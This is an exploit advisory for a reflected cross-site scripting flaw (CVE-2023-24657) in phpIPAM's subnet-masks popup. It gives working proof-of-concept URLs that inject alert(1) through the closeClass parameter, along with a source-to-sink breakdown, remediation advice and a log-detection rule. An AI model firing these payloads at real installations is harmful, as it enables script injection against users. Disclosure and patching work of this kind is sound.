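# Exploit Title: phpIPAM 1.6 - Reflected Cross Site Scripting (XSS)
# Date: 2024-10-26
# Exploit Author: CodeSecLab
# Vendor Homepage: https://github.com/phpipam/phpipam
# Software Link: https://github.com/phpipam/phpipam
# Version: 1.5.1
# Tested on: Ubuntu, Windows
# CVE : CVE-2023-24657
# Note: the title names 1.6 while the Version field gives 1.5.1; confirm the affected and fixed releases against the vendor's advisory for this CVE.

PoC:
1) http://phpipam/app/tools/subnet-masks/popup.php?closeClass=%22%3E%3Cscript%3Ealert(1)%3C/script%3E
2) http://phpipam/app/tools/subnet-masks/popup.php?closeClass=%22%20onclick=%22alert(1)%22

"Sink": "print @$_REQUEST['closeClass']",
"Vulnerable Variable": "closeClass",
"Source": "$_REQUEST['closeClass']",
"Sanitization Mechanisms Before Patch": "None",
"Sink Context Constraints": "Reflected within HTML attributes without escaping",
"Attack Payload": "\" onclick=\"alert(1)\"",
"Execution Path Constraints": "Directly accessed from the 'closeClass' parameter without modification",
"Request URL": "http://phpipam/app/tools/subnet-masks/popup.php?closeClass=%22%20onclick=%22alert(1)%22",
"Request Method": "GET",
"Final PoC": "http://phpipam/app/tools/subnet-masks/popup.php?closeClass=%22%20onclick=%22alert(1)%22"

[Replace "phpipam" in the URLs with the host name of your own installation]

Remediation: closeClass is printed into an HTML attribute, so it has to be encoded for that context before output, e.g. htmlspecialchars($value, ENT_QUOTES, 'UTF-8'), or restricted to an allow-list of the class names the popup actually uses. Because the sink reads $_REQUEST, the parameter is accepted from POST bodies (and, depending on the request_order setting, cookies) as well as the query string, so the fix belongs at the print statement rather than in a GET-only filter.
Detection: requests to app/tools/subnet-masks/popup.php whose closeClass value contains quote or angle-bracket characters, raw or percent-encoded, are worth flagging in web server logs.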